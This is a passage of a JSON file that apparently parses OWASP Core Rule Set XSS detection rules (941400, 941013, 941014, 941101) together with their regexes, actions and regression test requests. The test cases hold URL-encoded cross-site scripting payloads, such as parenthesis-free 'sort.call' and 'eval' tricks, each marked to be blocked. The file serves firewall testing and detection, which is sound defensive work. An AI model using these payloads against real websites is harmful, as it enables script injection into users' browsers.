"act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 747, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 748, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 749, "act_quote": "quotes", "act_arg": "platform-nodejs", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 750, "act_quote": "quotes", "act_arg": "attack-xss", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 751, "act_quote": "quotes", "act_arg": "xss-perf-disable", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 752, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 753, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 754, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-XSS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 755, "act_quote": "quotes", "act_arg": "capec/1000/152/242", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 756, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 757, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 758, "act_quote": "quotes", "act_arg": "tx.xss_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 759, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 739 } }, { "rule_id": "941400", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_COOKIES", "part": "", "negated": false }, { "name": "REQUEST_COOKIES_NAMES", "part": "", "negated": false }, { "name": "ARGS_NAMES", "part": "", "negated": false }, { "name": "ARGS", "part": "", "negated": false }, { "name": "REQUEST_FILENAME", "part": "", "negated": false }, { "name": "XML", "part": "/*", "negated": false } ], "operator": { "type": "@rx", "argument": "((?:\\[[^\\]]*\\][^.]*\\.)|Reflect[^.]*\\.).*(?:map|sort|apply)[^.]*\\..*call[^`]*`.*`", "negated": false } }, "transformations": [ "none", "urlDecodeUni", "compressWhitespace" ], "metadata": { "phase": "2", "message": "XSS JavaScript function without parentheses", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-xss" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "attack-xss", "xss-perf-disable", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/ATTACK-XSS", "capec/1000/152/242" ] }, "test_cases": [ { "description": "JavaScript function without parentheses", "test_id": 1, "request": { "method": "GET", "uri": "/get?xss=%5B%5D.sort.call%60%24%7Balert%7D1337%60", "headers": { "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "User-Agent": "OWASP CRS test agent" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 941400 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "xss=%5B%5D.sort.call%60%24%7Balert%7D1337%60" } ] }, { "description": "JavaScript function without parentheses", "test_id": 2, "request": { "method": "GET", "uri": "/get?xss=%5B%20%20%5D%20.%20sort%20.%20call%20%60%20%24%7B%20alert%20%7D%201337%20%60", "headers": { "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "User-Agent": "OWASP CRS test agent" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 941400 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "xss=%5B%20%20%5D%20.%20sort%20.%20call%20%60%20%24%7B%20alert%20%7D%201337%20%60" } ] }, { "description": "JavaScript function without parentheses", "test_id": 3, "request": { "method": "GET", "uri": "/get?xss=%5B%20%20%5D%20.%20%2F%2A%2A%2F%20sort%20.%20call%20%60%20%24%7B%20alert%20%7D%201337%20%60", "headers": { "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "User-Agent": "OWASP CRS test agent" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 941400 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "xss=%5B%20%20%5D%20.%20%2F%2A%2A%2F%20sort%20.%20call%20%60%20%24%7B%20alert%20%7D%201337%20%60" } ] }, { "description": "JavaScript function without parentheses", "test_id": 4, "request": { "method": "GET", "uri": "/get?xss=%5B%5D.map.call%60%24%7Beval%7D%5C%5Cu%7B61%7Dlert%5Cx281337%5Cx29%60", "headers": { "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "User-Agent": "OWASP CRS test agent" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 941400 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "xss=%5B%5D.map.call%60%24%7Beval%7D%5C%5Cu%7B61%7Dlert%5Cx281337%5Cx29%60" } ] }, { "description": "JavaScript function without parentheses", "test_id": 5, "request": { "method": "GET", "uri": "/get?xss=%5B%201234%20%5D.%20map%20.%20call%60%24%7Beval%7D%2F%2A%20asd%20%2A%2F%5C%5Cu%7B61%7Dlert%5Cx281337%5Cx29%60", "headers": { "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "User-Agent": "OWASP CRS test agent" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 941400 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "xss=%5B%201234%20%5D.%20map%20.%20call%60%24%7Beval%7D%2F%2A%20asd%20%2A%2F%5C%5Cu%7B61%7Dlert%5Cx281337%5Cx29%60" } ] }, { "description": "JavaScript function without parentheses", "test_id": 6, "request": { "method": "GET", "uri": "/get?xss=Reflect.apply.call%60%24%7Bnavigation.navigate%7D%24%7Bnavigation%7D%24%7B%5Bname%5D%7D%60", "headers": { "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "User-Agent": "OWASP CRS test agent" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 941400 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "xss=Reflect.apply.call%60%24%7Bnavigation.navigate%7D%24%7Bnavigation%7D%24%7B%5Bname%5D%7D%60" } ] }, { "description": "Status Page Test - JavaScript minimal test with Reflect.sort.call``", "test_id": 7, "request": { "method": "GET", "uri": "/get?test=Reflect.sort.call%60%60", "headers": { "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "User-Agent": "OWASP CRS test agent" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 941400 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "test=Reflect.sort.call%60%60" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 771, "variables": [ { "variable": "REQUEST_COOKIES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_COOKIES_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_FILENAME", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "((?:\\[[^\\]]*\\][^.]*\\.)|Reflect[^.]*\\.).*(?:map|sort|apply)[^.]*\\..*call[^`]*`.*`", "actions": [ { "act_name": "id", "lineno": 772, "act_quote": "no_quote", "act_arg": "941400", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 773, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 774, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 775, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 776, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 776, "act_quote": "no_quote", "act_arg": "urlDecodeUni", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 776, "act_quote": "no_quote", "act_arg": "compressWhitespace", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 777, "act_quote": "quotes", "act_arg": "XSS JavaScript function without parentheses", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 778, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 779, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 780, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 781, "act_quote": "quotes", "act_arg": "attack-xss", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 782, "act_quote": "quotes", "act_arg": "xss-perf-disable", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 783, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 784, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 785, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-XSS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 786, "act_quote": "quotes", "act_arg": "capec/1000/152/242", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 787, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 788, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 789, "act_quote": "quotes", "act_arg": "tx.xss_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 790, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 771 } }, { "rule_id": "941013", "has_tests": false, "detection": { "variables": [ { "name": "TX", "part": "DETECTION_PARANOIA_LEVEL", "negated": false } ], "operator": { "type": "@lt", "argument": "2", "negated": false } }, "transformations": [], "metadata": { "phase": "1", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [], "severity": null, "tags": [ "OWASP_CRS" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 793, "variables": [ { "variable": "TX", "variable_part": "DETECTION_PARANOIA_LEVEL", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@lt", "operator_argument": "2", "actions": [ { "act_name": "id", "lineno": 793, "act_quote": "no_quote", "act_arg": "941013", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 793, "act_quote": "no_quote", "act_arg": "1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "pass", "lineno": 793, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "nolog", "lineno": 793, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 793, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 793, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "skipAfter", "lineno": 793, "act_quote": "no_quote", "act_arg": "END-REQUEST-941-APPLICATION-ATTACK-XSS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 793 } }, { "rule_id": "941014", "has_tests": false, "detection": { "variables": [ { "name": "TX", "part": "DETECTION_PARANOIA_LEVEL", "negated": false } ], "operator": { "type": "@lt", "argument": "2", "negated": false } }, "transformations": [], "metadata": { "phase": "2", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [], "severity": null, "tags": [ "OWASP_CRS" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 794, "variables": [ { "variable": "TX", "variable_part": "DETECTION_PARANOIA_LEVEL", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@lt", "operator_argument": "2", "actions": [ { "act_name": "id", "lineno": 794, "act_quote": "no_quote", "act_arg": "941014", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 794, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "pass", "lineno": 794, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "nolog", "lineno": 794, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 794, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 794, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "skipAfter", "lineno": 794, "act_quote": "no_quote", "act_arg": "END-REQUEST-941-APPLICATION-ATTACK-XSS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 794 } }, { "rule_id": "941101", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_FILENAME", "part": "", "negated": false }, { "name": "REQUEST_HEADERS", "part": "Referer", "negated": false } ], "operator": { "type": "@detectXSS", "argument": "", "negated": false } }, "transformations": [ "none", "utf8toUnicode", "urlDecodeUni", "htmlEntityDecode", "jsDecode", "cssDecode", "removeNulls" ], "metadata": { "phase": "1", "message": "XSS Attack Detected via libinjection", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-xss" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-xss", "xss-perf-disable", "paranoia-level/2", "OWASP_CRS", "OWASP_CRS/ATTACK-XSS", "capec/1000/152/242" ] }, "test_cases": [ { "description": "", "test_id": 1, "request": { "method": "GET", "uri": "/get", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Referer": "www.github.com